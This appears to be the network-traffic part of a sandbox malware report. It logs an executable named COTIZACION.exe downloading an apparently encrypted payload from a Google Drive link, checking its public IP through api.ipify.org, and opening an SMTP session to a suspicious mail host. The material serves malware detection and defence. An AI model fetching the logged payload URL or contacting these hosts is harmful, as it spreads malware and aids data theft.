                                                                                              Nov 5, 2024 12:38:38.362621069 CET64765443192.168.2.9104.26.12.205
                                                                                              Nov 5, 2024 12:38:38.364504099 CET64765443192.168.2.9104.26.12.205
                                                                                              Nov 5, 2024 12:38:38.364516020 CET44364765104.26.12.205192.168.2.9
                                                                                              Nov 5, 2024 12:38:38.364763021 CET44364765104.26.12.205192.168.2.9
                                                                                              Nov 5, 2024 12:38:38.368082047 CET64765443192.168.2.9104.26.12.205
                                                                                              Nov 5, 2024 12:38:38.411339998 CET44364765104.26.12.205192.168.2.9
                                                                                              Nov 5, 2024 12:38:38.543307066 CET44364765104.26.12.205192.168.2.9
                                                                                              Nov 5, 2024 12:38:38.543395996 CET44364765104.26.12.205192.168.2.9
                                                                                              Nov 5, 2024 12:38:38.543488026 CET64765443192.168.2.9104.26.12.205
                                                                                              Nov 5, 2024 12:38:38.549565077 CET64765443192.168.2.9104.26.12.205
                                                                                              Nov 5, 2024 12:38:40.108490944 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:40.113395929 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:40.113504887 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:40.754591942 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:40.754873037 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:40.759784937 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:40.906240940 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:40.906735897 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:40.911648989 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.060506105 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.060966969 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:41.065849066 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.235359907 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.235373020 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.235733986 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:41.236645937 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.236658096 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.236738920 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.236854076 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:41.264004946 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:41.268903017 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.415762901 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.418828011 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:41.423659086 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.570050955 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.571295977 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:41.576103926 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.726183891 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.727511883 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:41.741770983 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.901160002 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:41.901443958 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:41.906405926 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:42.055053949 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:42.055325985 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:42.060285091 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:42.219837904 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:42.220005989 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:42.224838972 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:42.370505095 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:42.372782946 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:42.375971079 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:42.375972033 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:42.375972033 CET64766587192.168.2.967.23.226.139
                                                                                              Nov 5, 2024 12:38:42.377625942 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:42.380904913 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:42.531953096 CET5876476667.23.226.139192.168.2.9
                                                                                              Nov 5, 2024 12:38:42.579448938 CET64766587192.168.2.967.23.226.139
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 5, 2024 12:37:31.648945093 CET53591951.1.1.1192.168.2.9
                                                                                              Nov 5, 2024 12:38:29.886789083 CET6055553192.168.2.91.1.1.1
                                                                                              Nov 5, 2024 12:38:29.894202948 CET53605551.1.1.1192.168.2.9
                                                                                              Nov 5, 2024 12:38:31.337650061 CET5593353192.168.2.91.1.1.1
                                                                                              Nov 5, 2024 12:38:31.345407009 CET53559331.1.1.1192.168.2.9
                                                                                              Nov 5, 2024 12:38:37.711281061 CET6167253192.168.2.91.1.1.1
                                                                                              Nov 5, 2024 12:38:37.720190048 CET53616721.1.1.1192.168.2.9
                                                                                              Nov 5, 2024 12:38:39.740972042 CET4947653192.168.2.91.1.1.1
                                                                                              Nov 5, 2024 12:38:40.106692076 CET53494761.1.1.1192.168.2.9
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Nov 5, 2024 12:38:29.886789083 CET192.168.2.91.1.1.10x19f5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 12:38:31.337650061 CET192.168.2.91.1.1.10xc99eStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 12:38:37.711281061 CET192.168.2.91.1.1.10xad51Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 12:38:39.740972042 CET192.168.2.91.1.1.10x6a83Standard query (0)mail.showpiece.trillennium.bizA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Nov 5, 2024 12:37:08.622479916 CET1.1.1.1192.168.2.90x13e0No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Nov 5, 2024 12:37:08.622479916 CET1.1.1.1192.168.2.90x13e0No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 12:38:29.894202948 CET1.1.1.1192.168.2.90x19f5No error (0)drive.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 12:38:31.345407009 CET1.1.1.1192.168.2.90xc99eNo error (0)drive.usercontent.google.com142.250.185.161A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 12:38:37.720190048 CET1.1.1.1192.168.2.90xad51No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 12:38:37.720190048 CET1.1.1.1192.168.2.90xad51No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 12:38:37.720190048 CET1.1.1.1192.168.2.90xad51No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 12:38:40.106692076 CET1.1.1.1192.168.2.90x6a83No error (0)mail.showpiece.trillennium.bizshowpiece.trillennium.bizCNAME (Canonical name)IN (0x0001)false
                                                                                              Nov 5, 2024 12:38:40.106692076 CET1.1.1.1192.168.2.90x6a83No error (0)showpiece.trillennium.biz67.23.226.139A (IP address)IN (0x0001)false
                                                                                              • drive.google.com
                                                                                              • drive.usercontent.google.com
                                                                                              • api.ipify.org
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.964763142.250.185.2384437796C:\Users\user\Desktop\COTIZACION.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-05 11:38:30 UTC216OUTGET /uc?export=download&id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2024-11-05 11:38:31 UTC1610INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 05 Nov 2024 11:38:31 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-Uu8iSgZZNLLraOoMG9G_Bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.964764142.250.185.1614437796C:\Users\user\Desktop\COTIZACION.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-05 11:38:32 UTC258OUTGET /download?id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-11-05 11:38:34 UTC4930INHTTP/1.1 200 OK
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Security-Policy: sandbox
                                                                                              Content-Security-Policy: default-src 'none'
                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                              X-Content-Security-Policy: sandbox
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Content-Disposition: attachment; filename="xNXCSCUaWtBZCXPxCdsqI231.bin"
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Credentials: false
                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 240192
                                                                                              Last-Modified: Thu, 31 Oct 2024 13:26:33 GMT
                                                                                              X-GUploader-UploadID: AHmUCY3_TwSlRL-hFr8jdCz5qXM5Lb0gVmncG9J3FxanAolo4i6sf2Imfk-tK_Wm0G9vRaA7qkJ90Yy0Jg
                                                                                              Date: Tue, 05 Nov 2024 11:38:34 GMT
                                                                                              Expires: Tue, 05 Nov 2024 11:38:34 GMT
                                                                                              Cache-Control: private, max-age=0
                                                                                              X-Goog-Hash: crc32c=5iM8ZA==
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close
                                                                                              2024-11-05 11:38:34 UTC4930INData Raw: 93 a9 37 5e 77 bc d1 80 c7 53 16 32 70 df 2d 10 7a 44 6c 5b 27 c8 c9 85 d2 1b ed 33 03 25 8f 88 3e 4e 58 72 e9 7f 75 d6 a3 2a 79 ae 79 96 04 d0 56 35 16 ba f5 22 82 2c 8e 68 0f 12 f1 b0 b2 8c 01 72 a4 82 0f d4 ab 18 46 0b 6e c0 52 34 9f d5 fc 3e d8 98 a1 b7 78 2a 56 3c c0 5d af 5a 1a ba 16 d9 18 fb 76 21 85 cf 7b 05 f5 47 ee ec 0c 7e aa a2 b6 51 11 3b 92 cd 05 e4 92 59 32 36 5d de 82 71 66 c1 70 cd 9f 6c 9e e1 e2 04 8a 62 1b c1 8e 10 cc e1 e5 a3 16 9b 3c ea 72 71 62 0c 16 84 ba 12 2f a5 db 88 ed 61 9f 39 f6 2c d7 75 ce b9 aa 39 a7 a5 5d 14 6e 4d 23 f4 87 1a 45 cb cb ab 2c 34 64 21 f2 86 d1 0a 88 ba 35 a4 97 9e 38 62 85 35 7a ea ca 40 62 4d 02 aa 75 ab 39 22 d4 22 4c da 8c 8a 12 eb 35 15 03 b2 1d 09 0a 21 b4 c8 94 e3 ad 74 f3 f4 21 0e 24 d2 88 22 33 8a 22
                                                                                              Data Ascii: 7^wS2p-zDl['3%>NXru*yyV5",hrFnR4>x*V<]Zv!{G~Q;Y26]qfplb<rqb/a9,u9]nM#E,4d!58b5z@bMu9""L5!t!$"3"
                                                                                              2024-11-05 11:38:34 UTC4837INData Raw: fa 03 bc c7 ff 30 05 35 96 9b c7 bb 60 b8 36 eb 8a e8 e3 45 35 7a 47 66 89 a8 3f dc 01 37 4f 7b 4f 55 9c 5e e5 2c 25 e1 87 65 84 f6 93 11 f3 fe 1a 39 62 67 db 39 13 ec 9a d5 91 1b 33 aa c0 b9 c0 f0 fc 3c 36 36 46 8a aa 1e 43 f3 43 9d 37 f3 95 5f bc 42 c9 62 85 e9 a9 e8 fc 21 18 6f d2 4e 22 00 a1 81 9d 04 8c d7 63 35 19 ff a3 8a 95 12 40 17 62 82 54 c1 13 a8 dc 9f 15 c8 a6 0b 8c b0 4b 62 df 61 ec 3d d1 c5 91 96 96 03 87 ff b4 44 c9 17 66 eb 78 13 09 1d fe 60 c5 de 1f 1b c2 f9 52 81 42 e9 52 c3 ea 29 6d c4 5c cc 8b d7 6c 6c ec 97 59 30 b4 c8 00 01 93 1e 53 5e 89 e8 e5 82 78 09 05 8d 2d c4 84 4d f0 67 7d 07 52 47 e1 9c 6a f4 b3 20 e5 e4 c9 7e c2 5a 5f ff 8c 29 05 52 c5 bb cb fd 81 90 78 ca 28 fd 04 8b 5e 26 59 26 b5 a6 15 85 a5 06 50 9d 6c 01 d5 dc ec a0 e4
                                                                                              Data Ascii: 05`6E5zGf?7O{OU^,%e9bg93<66FCC7_Bb!oN"c5@bTKba=Dfx`RBR)m\llY0S^x-Mg}RGj ~Z_)Rx(^&Y&Pl
                                                                                              2024-11-05 11:38:34 UTC1324INData Raw: 1a 43 2f bf 4a e6 6d 13 42 1a 17 17 58 63 7c b9 d6 a9 27 da ef 5d ae fa 9c f9 4b 77 69 72 78 58 f9 f1 47 75 b5 6f 4e 7a 31 03 35 8a 06 57 d5 04 7d be 2c b1 e1 8b c6 e5 ec 8b 8d 14 69 52 25 0b d7 8e 79 88 f5 61 53 1a 77 af ae f4 02 3a fe 2b 7a 7d fa d2 d2 c6 d7 31 da b6 4b d1 1a 61 45 bc 0f dc 54 5d d4 24 82 ef a1 33 55 d6 c1 94 5a f5 a9 67 0e f0 92 aa 10 a7 90 20 dd 3d 9f 56 a7 7c 0e 4e a3 4d be 6e c8 b2 c0 69 96 3d 7b 5b 9c 41 dc 1b f6 6d a5 7f a7 3e 0f 78 f7 58 49 74 63 6c 9a dd 1f 61 3e 87 2e 31 1c 53 8b ac b6 a5 13 20 12 60 07 05 5b fb ef 5a c3 e2 a1 84 27 47 49 e6 6f 82 6f 80 73 f5 9c 85 73 8f 61 71 3e e6 ba a0 26 2f 78 a6 f0 8c fe c9 e5 78 94 e5 e1 94 6d d7 ab e5 17 08 35 49 af 85 76 16 34 57 64 90 99 64 72 79 40 72 e1 83 1d 3d cc a3 2a ec 38 58 c9
                                                                                              Data Ascii: C/JmBXc|']KwirxXGuoNz15W},iR%yaSw:+z}1KaET]$3UZg =V|NMni={[Am>xXItcla>.1S `[Z'GIoossaq>&/xxm5Iv4Wddry@r=*8X
                                                                                              2024-11-05 11:38:34 UTC1378INData Raw: 8c 09 1f cb 5d 19 1d 7c d0 c4 cb 00 ac a6 68 96 6e 2e 0b dc c4 37 35 f6 eb f4 1e bd 23 cb 89 bf 05 b4 90 74 36 69 00 c2 05 02 e5 46 aa 3d 62 da 27 d3 40 b6 ea 84 f6 f1 26 d1 19 5b f7 fb b4 5e 72 0e 22 b9 e2 db cd 72 0e 28 11 70 eb 83 8b b0 b6 f0 b0 f7 2b 67 61 f5 c4 c3 60 fc 61 b3 4a d3 ef 24 4a bd 75 50 c4 16 7b d9 bf b9 15 47 33 5b 1a 04 27 a5 62 5c b6 d6 a9 2f e2 2c 4e 8e fa bc e3 4b 89 67 8f 76 6c fc f0 b9 79 b9 91 62 6b 31 23 30 74 07 6e 30 05 44 a8 d2 bd e5 75 e2 db ec 75 8b 99 2d 12 3f 0a 29 80 59 8e d5 72 53 e4 79 52 a0 f8 fc 36 03 27 56 7f da d6 d2 38 d6 f6 ca 8f 69 d1 e4 6d bb b6 f1 d2 7d 62 f4 27 88 cf b1 cd 5b d5 ab cc 8c b9 aa 67 24 0a 9c ae 10 79 94 19 fe 3d 61 58 55 75 0e b0 d3 22 be 4e d8 4c cc 6b 68 c2 4e 41 9c 69 de e5 fa 42 5b 59 99 3e
                                                                                              Data Ascii: ]|hn.75#t6iF=b'@&[^r"r(p+ga`aJ$JuP{G3['b\/,NKgvlybk1#0tn0Duu-?)YrSyR6'V8im}b'[g$y=aXUu"NLkhNAiB[Y>
                                                                                              2024-11-05 11:38:34 UTC1378INData Raw: d2 5b 17 42 e7 f0 53 59 95 cd f4 e2 c4 23 60 25 3f 43 90 a4 7f 99 08 c9 c8 cd 06 1b 2d 63 86 68 c3 57 87 62 63 72 7c 8d 1e 6e da 8c 66 7c 50 d2 1f 8c 09 1d 15 56 1b 1d 5c 2a ca c8 00 52 56 67 95 6e f0 0f df c4 17 ce f7 d2 fa e0 bc 1a e5 f9 bf 05 4a bc 7d 36 97 0c 3d 0b 41 44 b9 ab ce 41 dc 07 d8 40 48 e4 79 f7 c8 f8 dd 1a 5b 29 f2 b4 5e 09 94 23 80 ec 25 c0 73 0e 73 77 70 eb 87 1a 85 b5 f0 b6 29 2b 64 61 d5 3c cd 63 fc 9f 4c 7f d5 ef 04 4a 85 70 50 3a 17 7a 25 41 46 ea 6d 13 5a 1a 17 17 58 6c 46 b7 d6 57 2b e1 2c 7f a2 fa bc e3 b5 76 50 89 76 54 f9 c9 bc 79 b9 6f 56 b6 cc fc ca 0a 4b 6e ce 0e 83 b7 d3 bd 1b 82 ec db 12 82 84 98 05 61 25 0a 2f aa 79 93 e5 77 53 0a 76 51 a0 f3 02 3a 11 07 76 7d da d6 2c c8 d4 cf e3 fc 69 d1 1a 61 45 ba 0c dc 5c 60 d4 24 88
                                                                                              Data Ascii: [BSY#`%?C-chWbcr|nf|PV\*RVgnJ}6=ADA@Hy[)^#%sswp)+da<cLJpP:z%AFmZXlFW+,vPvTyoVKna%/ywSvQ:v},iaE\`$
                                                                                              2024-11-05 11:38:34 UTC1378INData Raw: 68 57 a3 11 94 00 7e 85 84 f3 bc 05 f5 3f e6 f5 ae 6c 86 f9 2c 85 4b 15 85 d9 34 01 41 e3 5b ec e1 79 96 94 65 55 5f 71 c6 74 2f da e5 9d 0c d7 e1 7e a5 d1 aa cd f0 53 a7 87 fc f6 c2 24 23 60 25 0c ed 90 b5 5f b9 0a c9 c8 33 f6 17 2e 5b 07 96 cf 54 87 bc 6b 70 7c ad e1 6f e3 82 98 7d 69 f6 90 8c 09 e3 3c 53 1b 66 28 d4 c4 cf 28 0e a8 6b 9c 54 7d 07 df c4 37 32 f6 eb f4 1e b2 18 dd 89 41 09 48 9c 54 34 97 0c c3 fb 43 7d ab 55 c2 42 fc 27 d3 40 48 1a 89 f6 f1 f8 de 1a 5b d7 05 ba 5c 72 f0 dd 8c ea db ed 72 0e 08 10 8e ea ba 7f be b5 f0 b0 29 26 64 61 d5 3c cd 62 fc 9f 4c 7f d4 ef 04 49 85 70 50 3a 17 7a 2a 41 46 ea 55 36 5b 1a 17 2f dc 9d ba 48 28 a0 27 e2 57 2a ae fa b8 c6 b5 79 68 8c 88 59 f9 f1 91 24 b9 6f 64 96 38 03 35 0f 73 6e ce 00 55 b8 d2 bd e3 75
                                                                                              Data Ascii: hW~?l,K4A[yeU_qt/~S$#`%_3.[Tkp|o}i<Sf((kT}72AHT4C}UB'@H[\rr)&da<bLIpP:z*AFU6[/H('W*yhY$od85snUu
                                                                                              2024-11-05 11:38:34 UTC1378INData Raw: a5 83 a6 a2 9e fc fb 97 4e 52 1c e9 69 25 52 d8 95 be 50 32 07 4c 07 65 1f e3 f6 89 6f 80 62 6f d2 8d cd c0 c0 ca 3a 11 a9 b2 cb 5f 00 44 20 95 8b 9a 5b a3 31 b6 00 7e 85 7a 0c 84 2e ff 3f e6 0b a7 4c 87 d1 61 85 b5 1d a5 da 34 ff 4d 1d 55 cc e5 79 68 98 9b 54 46 7d c6 74 2f 1c e1 a4 2f d7 d9 2c a4 27 55 e7 d8 16 a7 9c ca 0a cb c5 23 40 56 00 ed 90 5a 7e e6 33 c4 ca cd f8 35 24 63 86 96 31 5a 87 42 67 8c 70 8d e0 4f f4 82 66 7c ae eb a9 86 09 1d 35 79 3b 05 5c d4 c4 35 0e 52 a8 6b 68 62 d0 07 ff 8e 17 30 f6 15 f5 d9 b6 1a dd 89 95 25 01 9c 74 36 69 02 c3 05 42 ba b5 55 c2 62 bd 27 d3 40 b6 e5 be d4 f1 d8 dd e4 52 d7 fb 91 25 06 f0 23 84 9a 57 c9 72 7e 20 0b 70 eb 89 08 ca b5 f0 b4 29 45 64 61 d5 3c cd 60 fc 9f 4c 7f d6 ef 04 78 85 70 50 3a 17 7a 25 41 46
                                                                                              Data Ascii: NRi%RP2Leobo:_D [1~z.?La4MUyhTF}t//,'U#@VZ~35$c1ZBgpOf|5y;\5Rkhb0%t6iBUb'@R%#Wr~ p)Eda<`LxpP:z%AF
                                                                                              2024-11-05 11:38:34 UTC1378INData Raw: 45 0e 0d e4 8e f6 e5 31 f8 3e fe 68 6d ff d1 2a de 06 a9 86 cb 23 52 c7 c2 7b df 37 1e c4 35 7c 1f a6 de 9e 2d 4d 5c 6d cb 45 f8 0d ec 2a 21 8d 40 d8 d7 e6 a2 9a dc 11 96 77 70 e2 e7 69 db 5b 26 99 9b 2b 66 3b 4c 03 17 63 e6 cf ee 47 9b 62 91 d1 f1 b9 e0 b0 ce 1a 50 e9 d9 36 5e f1 64 1d 95 75 96 a5 ad 11 b4 00 80 89 84 0d 9d 34 ff 3f e6 0b af 75 8d f9 2c 85 9f 3b 8c d9 34 ff b3 ed 5b cc e5 87 9a 94 9b 74 5f 74 c6 74 d1 e3 d9 8a 0c d7 d9 d2 53 2f 55 c7 fd 53 a7 9c 8c 5b 3d 3b dc 40 1f 00 ed 90 5a 71 b9 0a c9 36 c1 f8 15 0e 46 86 96 cf aa 86 7b 45 72 7c 8d 1e 66 e3 82 43 07 24 ea 90 88 7b c3 31 53 6b 35 47 d4 c4 c1 7d 26 a8 6b 92 4e f6 07 df c4 e9 3e f6 eb f4 1e b0 1a dd a9 94 05 4a 9c 8a 37 ae 2e c3 05 42 ba b0 55 c2 67 a7 53 d3 40 4c 96 6d f2 f1 a8 f5 01
                                                                                              Data Ascii: E1>hm*#R{75|-M\mE*!@wpi[&+f;LcGbP6^du4?u,;4[t_ttS/US[=;@Zq6F{Er|fC${1Sk5G}&kN>J7.BUgS@Lm
                                                                                              2024-11-05 11:38:34 UTC1378INData Raw: 18 8c bc 5d ba cd d2 7a 3c 5c 20 8b fe 7a 01 72 8d c6 fb fc 7f 9a 86 c6 2a 03 f6 82 5e 06 3d 3e b5 a6 e1 f9 ae 0d 50 99 92 27 f7 d0 83 b9 e4 a7 6f 45 0e 27 3a bb f6 e5 11 54 30 fe 68 93 00 e4 08 de 26 ba 78 c2 23 ac e3 80 2d df 37 1a 48 b6 79 1f f3 8d f1 2d 4d 52 62 6d 41 f8 79 e4 62 21 8d 4a 5b ad e6 a2 9e 02 09 96 77 50 16 e9 69 db a5 d9 ac b9 2b 46 07 b2 0a 17 9d c2 8d 8d 47 9b 66 1d 4c f5 b9 b0 e8 d5 1a 50 a3 cf bf a1 0e 40 00 9e 75 96 5b 5d 1f b4 00 7e 7b 88 0d bd 1c f2 3f e6 f5 50 4d be db 2c 85 b5 e5 8c d9 34 da 36 97 5b cc e1 0b 30 91 9b 24 4e 6f c6 74 25 9f 94 9d 0c d3 f9 22 5a 2e 55 19 fe 53 a7 9c 32 f8 c2 c4 03 63 25 00 ed 6e a5 46 ae 0a c9 c8 33 f1 14 2e 43 8e 96 cf 54 c7 8e 90 8d 83 ad e4 6f e3 82 98 72 50 ea 90 72 05 1d 35 73 53 1d 5c d4 3a
                                                                                              Data Ascii: ]z<\ zr*^=>P'oE':T0h&x#-7Hy-MRbmAyb!J[wPi+FGfLP@u[]~{?PM,46[0$Not%"Z.US2c%nF3.CTorPr5sS\:
                                                                                              2024-11-05 11:38:34 UTC1378INData Raw: 84 63 7e 4b ed ac ea 93 5d 45 cc 58 be a9 a3 77 1c c4 fc 71 25 be b5 7e ff 9d 19 73 c6 84 eb e5 0e 69 09 05 fd fb de 84 4d da 78 3a 07 52 c9 c8 b2 60 f4 b9 5d e0 c5 a7 7a 3c 56 a3 f1 fe 7a 05 ac b9 c6 fb dc d0 94 86 c6 d4 fc c3 95 5e 26 36 c0 bc a7 1f d8 e0 07 50 99 d2 d3 26 23 7c 99 b6 59 61 45 f0 29 c4 b7 f6 1b 3d 06 30 de 5c 6d 01 dd d4 df 1f 98 86 cb 23 52 cf fb 59 fa 4c 6a 3a 3c 78 6d b1 a3 ea 5d 65 43 1f 19 4b 85 09 c4 31 25 ad 7f a5 a3 e6 5c 90 fc 05 96 89 7c 1c e9 49 82 5b d8 95 65 2a 7f 0d 4c 03 17 b7 c7 ac f9 47 9b 9c 61 d8 f0 b9 3e cc ce 1a 70 8a b2 cb a1 f0 45 19 9f 75 96 5b 89 31 90 00 7e 85 7a 03 bd 3c ff c1 ea f5 ae 6c 9f f9 2c 85 4b 1a bc ce 34 ff 4d 1d 52 cd e5 59 b0 94 9b 54 26 43 31 8b d0 c2 f9 9d 0c d7 27 22 5a 2e 55 19 fc 53 a7 bc bd
                                                                                              Data Ascii: c~K]EXwq%~siMx:R`]z<Vz^&6P&#|YaE)=0\m#RYLj:<xm]eCK1%\|I[e*LGa>pEu[1~z<l,K4MRYT&C1'"Z.US


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.964765104.26.12.2054437796C:\Users\user\Desktop\COTIZACION.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-05 11:38:38 UTC155OUTGET / HTTP/1.1
